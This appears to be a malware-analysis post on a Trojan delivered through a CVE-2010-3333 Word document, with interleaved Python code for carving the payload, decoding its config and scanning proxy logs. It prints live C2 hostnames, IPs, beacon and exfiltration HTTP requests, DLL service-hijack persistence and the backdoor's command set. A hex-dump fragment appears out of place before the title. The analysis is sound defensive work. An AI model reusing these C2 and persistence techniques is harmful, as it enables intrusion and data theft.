0000095B  20 20 20 20 20 20 20 56  49 43 54 49 4d 5c 75 73        V ICTIM\us
0000096B  65 72 6e 61 6d 65 0a 2d  31 32 34 34 09 49 6d 6d ername.- 1244.Imm
0000097B  75 6e 69 74 79 44 65 62  75 67 67 65 72 2e 65 78 unityDeb ugger.ex
0000098B  65 20 20 20 20 56 49 43  54 49 4d 5c 75 73 65 72 e    VIC TIM\user
0000099B  6e 61 6d 65 0a 2d 31 33  33 32 09 73 68 73 74 61 name.-13 32.shsta
000009AB  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
000009BB  20 20 20 56 49 43 54 49  4d 5c 75 73 65 72 6e 61    VICTI M\userna
000009CB  6d 65 0a 2d 34 39 36 09  6e 6f 74 65 70 61 64 2e me.-496. notepad.
000009DB  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
000009EB  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
000009FB  2d 39 34 38 09 63 61 6c  63 2e 65 78 65 20 20 20 -948.cal c.exe   
00000A0B  20 20 20 20 20 20 20 20  20 20 20 20 20 56 49 43               VIC
00000A1B  54 49 4d 5c 75 73 65 72  6e 61 6d 65 0a 00       TIM\user name..
 000001A8  04 00 00 00 0d 00 00 00  34 39 36 00             ........ 496.
00000A29  25 00 00 00 0d 00 00 00  4b 69 6c 6c 69 6e 67 20 %....... Killing 
00000A39  70 72 6f 63 65 73 73 20  34 39 36 20 73 75 63 63 process  496 succ
00000A49  65 65 64 2e 00                                   eed..
 000001B4  04 00 00 00 0d 00 00 00  39 34 38 00             ........ 948.
00000A4E  25 00 00 00 0d 00 00 00  4b 69 6c 6c 69 6e 67 20 %....... Killing 
00000A5E  70 72 6f 63 65 73 73 20  39 34 38 20 73 75 63 63 process  948 succ
00000A6E  65 65 64 2e 00                                   eed..
 000001C0  08 00 00 00 0c 00 00 00                          ........ 
00000A73  01 04 00 00 0c 00 00 00  2d 30 09 20 20 20 20 20 ........ -0.     
00000A83  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 20                  
00000A93  20 20 20 0a 2d 34 09 53  79 73 74 65 6d 20 20 20    .-4.S ystem   
00000AA3  20 20 20 20 20 20 20 20  20 20 20 20 20 20 20 0a                 .
00000AB3  2d 33 38 30 09 73 6d 73  73 2e 65 78 65 20 20 20 -380.sms s.exe   
00000AC3  20 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20               NT 
00000AD3  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
00000AE3  0a 2d 36 31 32 09 63 73  72 73 73 2e 65 78 65 20 .-612.cs rss.exe 
00000AF3  20 20 20 20 20 20 20 20  20 20 20 20 20 20 0a 2d                .-
00000B03  36 33 36 09 77 69 6e 6c  6f 67 6f 6e 2e 65 78 65 636.winl ogon.exe
00000B13  20 20 20 20 20 20 20 20  20 20 20 20 4e 54 20 41              NT A
00000B23  55 54 48 4f 52 49 54 59  5c 53 59 53 54 45 4d 0a UTHORITY \SYSTEM.
00000B33  2d 36 38 30 09 73 65 72  76 69 63 65 73 2e 65 78 -680.ser vices.ex
00000B43  65 20 20 20 20 20 20 20  20 20 20 20 20 4e 54 20 e             NT 
00000B53  41 55 54 48 4f 52 49 54  59 5c 53 59 53 54 45 4d AUTHORIT Y\SYSTEM
00000B63  0a 2d 36 39 32 09 6c 73  61 73 73 2e 65 78 65 20 .-692.ls ass.exe 
00000B73  20 20 20 20 20 20 20 20  20 20 20 20 20 20 4e 54                NT
00000B83  20 41 55 54 48 4f 52 49  54 59 5c 53 59 53 54 45  AUTHORI TY\SYSTE
00000B93  4d 0a 2d 38 36 34 09 76  6d 61 63 74 68 6c 70 2e M.-864.v macthlp.
00000BA3  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 4e exe             N
00000BB3  54 20 41 55 54 48 4f 52  49 54 59 5c 53 59 53 54 T AUTHOR ITY\SYST
00000BC3  45 4d 0a 2d 38 39 32 09  73 76 63 68 6f 73 74 2e EM.-892. svchost.
00000BD3  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
00000BE3  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
00000BF3  54 45 4d 0a 2d 39 36 34  09 73 76 63 68 6f 73 74 TEM.-964 .svchost
00000C03  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000C13  20 0a 2d 31 30 37 32 09  73 76 63 68 6f 73 74 2e  .-1072. svchost.
00000C23  65 78 65 20 20 20 20 20  20 20 20 20 20 20 20 20 exe              
00000C33  4e 54 20 41 55 54 48 4f  52 49 54 59 5c 53 59 53 NT AUTHO RITY\SYS
00000C43  54 45 4d 0a 2d 31 31 32  38 09 73 76 63 68 6f 73 TEM.-112 8.svchos
00000C53  74 2e 65 78 65 20 20 20  20 20 20 20 20 20 20 20 t.exe            
00000C63  20 20 0a 2d 31 32 38 30  09 73 76 63 68 6f 73 74   .-1280 .svchost
00000C73  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000C83  20 0a 2d 31 36 30 34 09  65 78 70 6c 6f 72 65 72  .-1604. explorer
00000C93  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 20 20 .exe             
00000CA3  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
00000CB3  2d 31 36 38 30 09 56 4d  77 61 72 65 54 72 61 79 -1680.VM wareTray
00000CC3  2e 65 78 65 20 20 20 20  20 20 20 20 20 20 56 49 .exe           VI
00000CD3  43 54 49 4d 5c 75 73 65  72 6e 61 6d 65 0a 2d 31 CTIM\use rname.-1
00000CE3  37 30 38 09 56 4d 77 61  72 65 55 73 65 72 2e 65 708.VMwa reUser.e
00000CF3  78 65 20 20 20 20 20 20  20 20 20 20 56 49 43 54 xe           VICT
00000D03  49 4d 5c 75 73 65 72 6e  61 6d 65 0a 2d 31 37 38 IM\usern ame.-178
00000D13  30 09 73 76 63 68 6f 73  74 2e 65 78 65 20 20 20 0.svchos t.exe   
00000D23  20 20 20 20 20 20 20 20  20 20 0a 2d 31 39 32 38            .-1928
00000D33  09 76 6d 74 6f 6f 6c 73  64 2e 65 78 65 20 20 20 .vmtools d.exe   
00000D43  20 20 20 20 20 20 20 20  20 4e 54 20 41 55 54 48           NT AUTH
00000D53  4f 52 49 54 59 5c 53 59  53 54 45 4d 0a 2d 31 37 ORITY\SY STEM.-17
00000D63  34 34 09 63 6d 64 2e 65  78 65 20 20 20 20 20 20 44.cmd.e xe      
00000D73  20 20 20 20 20 20 20 20  20 20 20 56 49 43 54 49             VICTI
00000D83  4d 5c 75 73 65 72 6e 61  6d 65 0a 2d 31 31 37 36 M\userna me.-1176
00000D93  09 57 69 6e 48 65 78 2e  65 78 65 20 20 20 20 20 .WinHex. exe     
00000DA3  20 20 20 20 20 20 20 20  20 56 49 43 54 49 4d 5c           VICTIM\
00000DB3  75 73 65 72 6e 61 6d 65  0a 2d 33 39 32 09 69 64 username .-392.id
00000DC3  61 67 2e 65 78 65 20 20  20 20 20 20 20 20 20 20 ag.exe           
00000DD3  20 20 20 20 20 20 56 49  43 54 49 4d 5c 75 73 65       VI CTIM\use
00000DE3  72 6e 61 6d 65 0a 2d 31  36 34 38 09 73 74 75 6e rname.-1 648.stun
00000DF3  6e 65 6c 2e 65 78 65 20  20 20 20 20 20 20 20 20 nel.exe          
00000E03  20 20 20 20 56 49 43 54  49 4d 5c 75 73 65 72 6e     VICT IM\usern
00000E13  61 6d 65 0a 2d 31 32 34  34 09 49 6d 6d 75 6e 69 ame.-124 4.Immuni
00000E23  74 79 44 65 62 75 67 67  65 72 2e 65 78 65 20 20 tyDebugg er.exe  
00000E33  20 20 56 49 43 54 49 4d  5c 75 73 65 72 6e 61 6d   VICTIM \usernam
00000E43  65 0a 2d 31 33 33 32 09  73 68 73 74 61 74 2e 65 e.-1332. shstat.e
00000E53  78 65 20 20 20 20 20 20  20 20 20 20 20 20 20 20 xe               
00000E63  56 49 43 54 49 4d 5c 75  73 65 72 6e 61 6d 65 0a VICTIM\u sername.
00000E73  00                                               .

Laden’s Death.doc – CVE-2010-3333

  • Today I am looking at this file:
File Name:  Laden's Death.doc
File Size:  163065 bytes
MD5:        dad4f2a0f79db83f8976809a88d260c5
SHA1:       d563029a2dfe3cfcddc7326b1b486213095e58e5

CARRIER FILE ANALYSIS –> quick look

  • The obfuscation used in this file is not complex and is easily discernible.
  • The payload starts at file-offset 0x1AF9 and is obfuscated with a one byte XOR key 0xFC, skipping NULL bytes and bytes that match the key.
  • The extracted payload has the following characteristics:
File Name:  payload.exe
File Size:  73728 bytes
MD5:        60f9705746941e6a7b19468ffd2c02fb
SHA1:       d4c2f8e4da6d3085e1ecacb46053df7b28a37fb7
PE Time:    0x4DA5658C [Wed Apr 13 08:57:48 2011 UTC]
AV:         13/42 (31.0 %) [VirusTotal]
 Sections (5):
 Name      Entropy  MD5
 .text     5.02     0a3e48ce756511bd17a57a35b36c315a
 .rdata    2.88     5aaba9f0590d9d61026187197ed7d539
 .data     1.99     efe906def7f4fe4f939a56fd6e45fd6c
 .rsrc     1.29     6ef6f184eaa0b44304eb0685c2d95d95
 .idata    6.92     2583a7a9e62583bfcc9ccdaeb5be64a5
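As an added example (my code, not the author's tooling), here is a Python carver that applies the decoding rule described above, single-byte XOR that leaves NULL bytes and bytes equal to the key untouched, and then goes one step beyond the post: because other samples of this kind use other keys, it brute-forces the key by checking which candidate produces an MZ header whose e_lfanew points at a PE signature. The 0x1AF9 offset and the 0xFC key are the post's values; the carrier buffer and the fake executable inside it are constructed here for the demonstration.

```python
import struct
from typing import List, Optional

def xor_skip(data: bytes, key: int) -> bytes:
    """Single-byte XOR that leaves NULL bytes and bytes equal to the key untouched.
    The transform is its own inverse, so one function both encodes and decodes."""
    return bytes(b if b in (0, key) else b ^ key for b in data)

def looks_like_pe(blob: bytes) -> bool:
    """True if blob starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def guess_xor_key(doc: bytes, offset: int) -> List[int]:
    """Every single-byte key for which the data at `offset` decodes to a PE header.
    Only 4 KiB are decoded per candidate; that covers the DOS stub and e_lfanew."""
    window = doc[offset:offset + 0x1000]
    return [k for k in range(1, 256) if looks_like_pe(xor_skip(window, k))]

def carve_payload(doc: bytes, offset: int, key: int, length: Optional[int] = None) -> bytes:
    """Decode the embedded executable. Without a length, decode to the end of the
    carrier; trim to the PE's real size afterwards (the post reports 73728 bytes)."""
    end = len(doc) if length is None else offset + length
    payload = xor_skip(doc[offset:end], key)
    if not looks_like_pe(payload):
        raise ValueError("decoded data does not start with a valid MZ/PE header")
    return payload

# ---- constructed demo carrier (a stand-in for the real document) ----
PAYLOAD_OFFSET = 0x1AF9   # file offset reported in the post
DEMO_KEY = 0xFC           # key reported in the post

def build_demo_carrier() -> bytes:
    """A tiny fake PE containing NULL and 0xFC bytes, xor_skip-encoded and placed
    behind deterministic filler at PAYLOAD_OFFSET."""
    dos_header = bytearray(0x40)
    dos_header[:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x40)   # e_lfanew: PE signature right after the DOS header
    body = b"PE\0\0" + b"\xfc\x00\x01\x02" * 4 + b"This program cannot be run in DOS mode"
    fake_pe = bytes(dos_header) + body
    filler = (bytes(range(256)) * (PAYLOAD_OFFSET // 256 + 1))[:PAYLOAD_OFFSET]
    return filler + xor_skip(fake_pe, DEMO_KEY)

if __name__ == "__main__":
    carrier = build_demo_carrier()
    keys = guess_xor_key(carrier, PAYLOAD_OFFSET)
    print("candidate keys:", [hex(k) for k in keys])
    pe = carve_payload(carrier, PAYLOAD_OFFSET, keys[0])
    print("carved %d bytes, starts with %r" % (len(pe), pe[:2]))
```

The skip rule matters for the brute force: a plain XOR would turn every 0x00 in the executable into the key byte, so checking only for "MZ" would still work but the zero-filled DOS header would look wrong; with the skip rule the header decodes exactly and the PE-signature check becomes reliable.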

PAYLOAD.EXE ANALYSIS

- Filesystem artifacts

  • When the payload is executed it first tries to WinExec: notepda.dat (not misspelled) however this file does not exist.
  • Creates C:\WINDOWS\system32\hongzquit.dat. This is a 0 byte file, which is then deleted.
  • An obfuscated DLL within the payload is decrypted and written to a file in the user’s temp folder: vmm#.tmp.
  • The timestamps of this temp file are backdated to match those of notepad.exe.
  • File vmm#.tmp is moved to c:\windows\system32\dhcpsrv.dll
  • File dhcpsrv.dll has the following characteristics:
File Name:  dhcpsrv.dll
File Size:  44504 bytes
MD5:        06ddf39bc4b5c7a8950f1e8d11c44446
SHA1:       b8c11c68f3e92b60cc4b208bd5905c0365f28978
PE Time:    0x4D9C2616 [Wed Apr 06 08:36:38 2011 UTC]
AV:         6/42 (14.3 %) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.14     5c8b018d10792fdb74b5f289f97c5d06
 .rdata    4.73     88003ece00266ee44c21ac6242a7eafd
 .data     4.99     1d745a13a1f55e75b2f68adee97c6f59
 .reloc    5.7      e437cc92e10504181d7b712478db6af3
  • The dropped DLL is loaded using the following command:
rundll32.exe "C:\WINDOWS\system32\dhcpsrv.dll",CRestart 0x11
  • In addition to the CRestart function, this DLL also exports functions: CRestartA and ServiceMain
  • Payload.exe decrypts the configuration information of the DLL by XOR-ing with 0xFE starting at file-offset 0xAC00.
  • The configuration information specifies the name of the malicious DLL (in this case dhcpsrv.dll), and which service will be hijacked (in this case the DHCP service).
  • Here is the decrypted configuration data:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0000AC00   70 69 63 74 75 72 65 2E  75 63 70 61 72 6C 6E 65   picture.ucparlne
0000AC10   74 2E 63 6F 6D 00 00 00  00 00 00 00 00 00 00 00   t.com          
0000AC20   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC30   00 00 00 00 00 00 00 00  00 00 00 00 73 73 69 2E               ssi.
0000AC40   75 63 70 61 72 6C 6E 65  74 2E 63 6F 6D 00 00 00   ucparlnet.com  
0000AC50   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC60   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AC70   00 00 00 00 00 00 00 00  00 63 75 6D 65 6E 74 73            cuments
0000AC80   20 61 6E 64 20 53 65 74  74 69 6E 67 73 5C 72 6F    and Settings\ro
0000AC90   67 65 72 5C D7 C0 C3 E6  5C B9 A4 BE DF 5C BA EC   ger\×ÀÃæ\¹¤¾ß\ºì
0000ACA0   D6 D0 5B 32 30 31 31 30  34 32 33 5D 5C BA EC D6   ÖÐ[20110423]\ºìÖ
0000ACB0   D0 5B 32 30 00 00 00 00  32 33 5D 5C 53 65 72 76   Ð[20    23]\Serv
0000ACC0   65 72 5C 54 72 6F 79 43  00 6E 66 69 67 00 48 4C   er\TroyC nfig HL
0000ACD0   50 00 14 00 9C 13 DF 5A  0C 00 00 00 BB 01 50 00   P   œ ßZ    » P
0000ACE0   50 00 64 68 63 70 00 00  00 00 00 00 00 00 00 00   P dhcp         
0000ACF0   00 00 00 00 00 00 64 68  63 70 73 72 76 2E 64 6C         dhcpsrv.dl
0000AD00   6C 00 00 00 00 00 00 00  00 00 00 AC 00 00 68 74   l          ¬  ht
0000AD10   74 70 3A 2F 2F 63 68 65  63 6B 65 72 72 6F 72 2E   tp://checkerror.
0000AD20   75 63 70 61 72 6C 6E 65  74 2E 63 6F 6D 2F 6E 65   ucparlnet.com/ne
0000AD30   77 73 2E 6A 70 67 00 00  00 00 00 00 00 00 00 00   ws.jpg         
0000AD40   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AD50   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000AD60   00 00 00 00 00 00 00 00  00 00 00 00 00 85 75 73                …us
0000AD70   62 65 78 74 65 72 6E 2E  65 78 65 3A 30 2C 6B 62   bextern.exe:0,kb
0000AD80   65 78 74 65 72 6E 2E 65  78 65 3A 30 2C 6D 61 69   extern.exe:0,mai
0000AD90   6C 70 76 2E 62 61 74 3A  31 2C 4E 65 77 54 72 6F   lpv.bat:1,NewTro
0000ADA0   6A 61 6E 2E 64 6C 6C 3A  30 2C 00 00 00 00 00 00   jan.dll:0,     
0000ADB0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
0000ADC0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 00                  
0000ADD0   0B 4B D0 CF 11 E0 24 30                             KÐÏ à$0
  • The last two bytes of the data above (0x2430) are a checksum to verify the integrity of the configuration data.
  • If the data contained in the profile path is Chinese, it may look like this:
袤醱\馱撿\綻笢[20110423]\綻笢[20
  • Google Translate gives me this somewhat funny translation:
Vast fermentation \ pack pick \ Zhan Min [20110423] \ Zhan Min [20
  • If you understand Chinese maybe you can shed some light on this.
  • These other service names are present on this DLL, which may imply that this is a list of potential target services that the attacker can pick from when creating this Trojan.
Service Name       Original (non-malicious) file name
wuauserv           C:\WINDOWS\system32\wuauserv.dll
dhcp               C:\WINDOWS\system32\dhcpcsvc.dll
dmserver           C:\WINDOWS\system32\dmserver.dll
lanmanworkstation  C:\WINDOWS\system32\wkssvc.dll
EventSystem        C:\WINDOWS\system32\es.dll
Netman             C:\WINDOWS\system32\Netman.dll
  • So, payload.exe entrenches the DLL by hijacking the DHCP service: in the registry it replaces the service's original file (dhcpcsvc.dll) with the malicious one (dhcpsrv.dll) under ServiceDLL.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
ServiceDLL = C:\WINDOWS\system32\dhcpsrv.dll
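As an added example (my code, not the author's), here is a small Python parser that decrypts a configuration block with the 0xFE XOR and extracts the string fields visible in the dump above at the offsets where they sit there, relative to 0xAC00: the two C2 hostnames at 0x00 and 0x3C, the attacker's build path at 0x79, the service name at 0xE2, the DLL name at 0xF6, the download URL at 0x10E and the comma-separated file list at 0x16E. Whether those offsets hold for other builds, and what the binary fields between them mean, is not established by the post; the checksum algorithm is unknown too, so the trailing 0x2430 is only reported. The encrypted sample blob is constructed here from those strings. One detail the parser settles: the profile-path bytes (D7 C0 C3 E6 5C B9 A4 BE DF 5C BA EC D6 D0) are GBK-encoded Chinese and decode as 桌面\工具\红中, that is Desktop\Tools\HongZhong (红中 is the red dragon tile in mahjong), which reads far more naturally than the rendering quoted above.

```python
import struct

CONFIG_XOR_KEY = 0xFE
CONFIG_LEN = 0x1D8        # 0xAC00..0xADD7 in the dump

# String fields at the offsets where they sit in the decrypted dump (relative to 0xAC00).
# The binary fields between them are not explained by the post and are left alone here.
STRING_FIELDS = {
    0x000: ("c2_host_1", "ascii"),     # picture.ucparlnet.com
    0x03C: ("c2_host_2", "ascii"),     # ssi.ucparlnet.com
    0x079: ("build_path", "gbk"),      # attacker's build directory, GBK-encoded Chinese
    0x0E2: ("service_name", "ascii"),  # service to hijack
    0x0F6: ("dll_name", "ascii"),      # name the dropped DLL gets
    0x10E: ("download_url", "ascii"),  # news.jpg URL
    0x16E: ("file_list", "ascii"),     # "name:flag," entries the DLL looks for
}

def xor_bytes(data, key):
    return bytes(b ^ key for b in data)

def cstring_at(buf, offset):
    """Bytes from offset up to the first NUL (or the end of the buffer)."""
    end = buf.find(b"\0", offset)
    return buf[offset:] if end == -1 else buf[offset:end]

def parse_config(encrypted):
    """Decrypt a configuration block and return its string fields as a dict."""
    plain = xor_bytes(encrypted, CONFIG_XOR_KEY)
    cfg = {name: cstring_at(plain, off).decode(codec, "replace")
           for off, (name, codec) in STRING_FIELDS.items()}
    # "usbextern.exe:0,kbextern.exe:0,..." -> [("usbextern.exe", "0"), ...]
    cfg["file_list"] = [tuple(item.split(":", 1))
                        for item in cfg["file_list"].split(",") if item]
    # Trailing two bytes, read the way the post writes them (0x2430). The algorithm
    # behind the checksum is not described, so the value is only reported.
    cfg["checksum"] = struct.unpack_from(">H", plain, len(plain) - 2)[0]
    return cfg

def build_sample_config():
    """Constructed encrypted blob holding the strings from the dump at their offsets."""
    plain = bytearray(CONFIG_LEN)

    def put(off, data):
        plain[off:off + len(data)] = data

    put(0x000, b"picture.ucparlnet.com")
    put(0x03C, b"ssi.ucparlnet.com")
    # D7C0 C3E6 / B9A4 BEDF / BAEC D6D0 are GBK for 桌面 / 工具 / 红中 (Desktop / Tools / HongZhong)
    put(0x079, b"cuments and Settings\\roger\\" + bytes.fromhex("D7C0C3E6") + b"\\"
               + bytes.fromhex("B9A4BEDF") + b"\\" + bytes.fromhex("BAECD6D0")
               + b"[20110423]\\" + bytes.fromhex("BAECD6D0") + b"[20")
    put(0x0E2, b"dhcp")
    put(0x0F6, b"dhcpsrv.dll")
    put(0x10E, b"http://checkerror.ucparlnet.com/news.jpg")
    put(0x16E, b"usbextern.exe:0,kbextern.exe:0,mailpv.bat:1,NewTrojan.dll:0,")
    put(CONFIG_LEN - 2, b"\x24\x30")
    return xor_bytes(bytes(plain), CONFIG_XOR_KEY)

if __name__ == "__main__":
    for key, value in parse_config(build_sample_config()).items():
        print("%-13s %s" % (key, value))
```

The service name and DLL name are the two fields worth feeding into a hunt: together with the service table above they say which ServiceDLL value to compare against the known-good file name on every host.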
  • The dropper is then deleted.
  • Here are some other files you may find on the system infected with this Trojan:
C:\DOCUME~1\username\LOCALS~1\Temp\~Thumbbs.tmp
  (not misspelled, also HIDDEN and SYSTEM attributes set)
The Trojan looks for files: usbextern.exe, kbextern.exe, mailpv.bat and NewTrojan.dll
  (in the C:\WINDOWS\system32\ folder or wherever dhcpsrv.dll is located).
C:\DOCUME~1\username\LOCALS~1\Temp\pre#.tmp
  (this file would contain the file data of news.jpg from http://checkerror.ucparlnet.com/news.jpg)

NETWORK ARTIFACTS – dhcpsrv.dll

  • The Trojan tries to resolve the following domains:
checkerror.ucparlnet.com  - 203.67.127.165 over TCP port 80
ssi.ucparlnet.com         - 58.34.152.233 over TCP port 80
www.dnswatch.info         - not malicious, however relevant in this context
picture.ucparlnet.com     - 203.67.127.165 over TCP port 443 (NOT SSL)
  • The Trojan also makes direct DNS queries to the following two IP addresses: 139.175.55.244 and 168.95.1.1
244.55.175.139.in-addr.arpa.    PTR    86400    dns.seed.net.tw.
1.1.95.168.in-addr.arpa.        PTR    86400    dns.hinet.net.
  • The Trojan first tries to resolve its hostnames indirectly by sending the following type of request to www.dnswatch.info over TCP port 80:
GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)
Host: www.dnswatch.info
Cache-Control: no-cache
  • The Trojan parses the reply from www.dnswatch.info for the phrase “A record found:” and then connects to the IP address that follows it. So, www.dnswatch.info is being used as a DNS proxy.
  • Therefore, the domain www.dnswatch.info is not malicious, but it is relevant in the context of this Trojan: because the lookups go through it, you may never see the hostnames picture.ucparlnet.com and ssi.ucparlnet.com in your DNS logs.
  • The Trojan sends this type of request to checkerror.ucparlnet.com (this DNS query is done normally):
GET /news.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
Host: checkerror.ucparlnet.com
Connection: Keep-Alive
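To turn the DNS-proxy observation into a check, here is an added Python example (not from the post) that scans web-proxy log lines for lookups sent through www.dnswatch.info, extracts the host= parameter so that names which never reach the local resolver still surface, and separately flags the two user-agent strings and the C2 hostnames seen above. The tab-separated log format and the sample lines are constructed for the demonstration; a real proxy log needs the field split adapted.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators from the post
DNS_PROXY_HOST = "www.dnswatch.info"
KNOWN_C2_HOSTS = {"picture.ucparlnet.com", "ssi.ucparlnet.com", "checkerror.ucparlnet.com"}
KNOWN_USER_AGENTS = {
    "Mozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)",
    "Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)",
}

# Constructed log format: timestamp<TAB>client<TAB>method<TAB>url<TAB>user-agent
LOG_LINE = re.compile(r"^(?P<ts>\S+)\t(?P<client>\S+)\t(?P<method>\S+)\t(?P<url>\S+)\t(?P<ua>.*)$")

def proxied_lookup(url):
    """Hostname being resolved if url is a dnswatch.info lookup, else None."""
    parts = urlsplit(url)
    if parts.hostname != DNS_PROXY_HOST or not parts.path.endswith("/dns/dnslookup"):
        return None
    hosts = parse_qs(parts.query).get("host")
    return hosts[0].lower() if hosts else None

def scan_proxy_log(lines):
    """Return (client, reason, detail, severity) findings.
    Every proxied lookup is reported, since the looked-up name never appears in
    DNS logs; a name from the C2 list raises it to high."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, url, ua = m["client"], m["url"], m["ua"]
        looked_up = proxied_lookup(url)
        if looked_up:
            severity = "high" if looked_up in KNOWN_C2_HOSTS else "info"
            findings.append((client, "dns-over-http lookup", looked_up, severity))
        if urlsplit(url).hostname in KNOWN_C2_HOSTS:
            findings.append((client, "known C2 host", urlsplit(url).hostname, "high"))
        if ua in KNOWN_USER_AGENTS:
            findings.append((client, "known user-agent", ua, "medium"))
    return findings

# Constructed sample log: one infected client (10.0.0.7) and one ordinary user (10.0.0.9)
SAMPLE_LOG = [
    "2011-05-04T05:54:12Z\t10.0.0.7\tGET\thttp://www.dnswatch.info/dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve\tMozilla/5.0 (compatible; MSIE 6.0.1; WININET 5.0)",
    "2011-05-04T05:54:40Z\t10.0.0.7\tPOST\thttp://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3\tMozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)",
    "2011-05-04T05:55:01Z\t10.0.0.9\tGET\thttp://www.dnswatch.info/dns/dnslookup?la=en&host=example.org&type=A&submit=Resolve\tMozilla/5.0 (Windows NT 6.1) Firefox/4.0",
    "2011-05-04T05:55:02Z\t10.0.0.9\tGET\thttp://www.example.org/\tMozilla/5.0 (Windows NT 6.1) Firefox/4.0",
]

if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print("%-10s %-22s %-45s %s" % finding)
```

The "info" findings are the point of the exercise: a person using dnswatch.info by hand is harmless, but the looked-up names are the only trace of the Trojan's hostname resolution you will get from this host, so they belong in the same place as your passive-DNS data.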
  • It sent the following types of request to ssi.ucparlnet.com over TCP port 80 and picture.ucparlnet.com over TCP port 443 (NOT SSL):
POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1
User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)
Host: ssi.ucparlnet.com
Content-Length: 39
Proxy-Connection: keep-alive
Pragma: no-cache
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
00 00 00 00 00 00 00 00  00 00 00 00 07 00 00 00   ........ ........
f1 ee e4 f3 ee ea a7                               .......

ENCRYPTION KEY

  • The 8th DWORD (bytes 29 – 32) is an integer that specifies the length of the data that follows (in this case 7 bytes)
  • The last seven bytes (0xF1EEE4F3EEEAA7) are the machine name XOR-ed with 0xA7.  Since the plaintext ends with a NULL terminator, the last byte on the wire equals the key itself, so if another iteration of this Trojan uses a different value, an easy way to determine the XOR key is to take that last byte.
  • The Trojan expects at least 32 bytes on its first reply.  The eighth DWORD again is an integer that specifies the length of the data that follows.
TROJAN FUNCTIONALITY

  • This Trojan offers the following functionality (the hex values are explained below):
    • 0xA1B1 > Directory listing
    • 0xA1B3 > Delete a file
    • 0xA1B4 > Upload a file (from C2 node to victim)
    • 0xA1B5 > Download a file (from victim to C2 node)
    • 0xA1B7 > Execute a file
    • 0xA1C1 > Report system’s local time.
    • 0xBBB1 > List basic system Information
    • 0xBBB2 > Can be instructed to run only during certain times.
    • 0xBBB3 > Uninstall
    • 0xBBB4 > Communicate with another specified hostname (this does not really work – read below)
  • I received a PCAP from this Trojan, which does not have any meaningful communication with the Trojan other than the following behavior:
    • When this Trojan first connects to the C2 node, it appears the C2 node assigns the victim a number in the form of: “new_host_#” (XOR-ed with 0xA7 below: 0xc9c2d0f8cfc8d4d3f893a7), and the victim (i.e. the Trojan) uses it in the header of all subsequent transmissions in plain text (new_host_4).
    • This is probably a way for the C2 node to keep track of unique hosts with which it is communicating.
  • After this initial exchange, the Trojan transmits some basic system information (machine name, OS version, username, IP address, and drive letters) to the C2 node.
00000000  50 4f 53 54 20 68 74 74  70 3a 2f 2f 70 69 63 74 POST htt p://pict
00000010  75 72 65 2e 75 63 70 61  72 6c 6e 65 74 2e 63 6f ure.ucpa rlnet.co
00000020  6d 3a 34 34 33 2f 50 48  71 67 48 75 6d 65 61 79 m:443/PH qgHumeay
00000030  35 37 30 35 2e 6d 70 33  20 48 54 54 50 2f 31 2e 5705.mp3  HTTP/1.
00000040  31 0d 0a 55 73 65 72 2d  41 67 65 6e 74 3a 20 4d 1..User- Agent: M
00000050  6f 7a 69 6c 6c 61 2f 34  2e 38 2e 32 30 20 28 63 ozilla/4 .8.20 (c
00000060  6f 6d 70 61 74 69 62 6c  65 3b 20 4d 53 49 45 20 ompatibl e; MSIE 
00000070  35 2e 30 2e 32 3b 20 57  69 6e 33 32 29 0d 0a 48 5.0.2; W in32)..H
00000080  6f 73 74 3a 20 70 69 63  74 75 72 65 2e 75 63 70 ost: pic ture.ucp
00000090  61 72 6c 6e 65 74 2e 63  6f 6d 20 0d 0a 43 6f 6e arlnet.c om ..Con
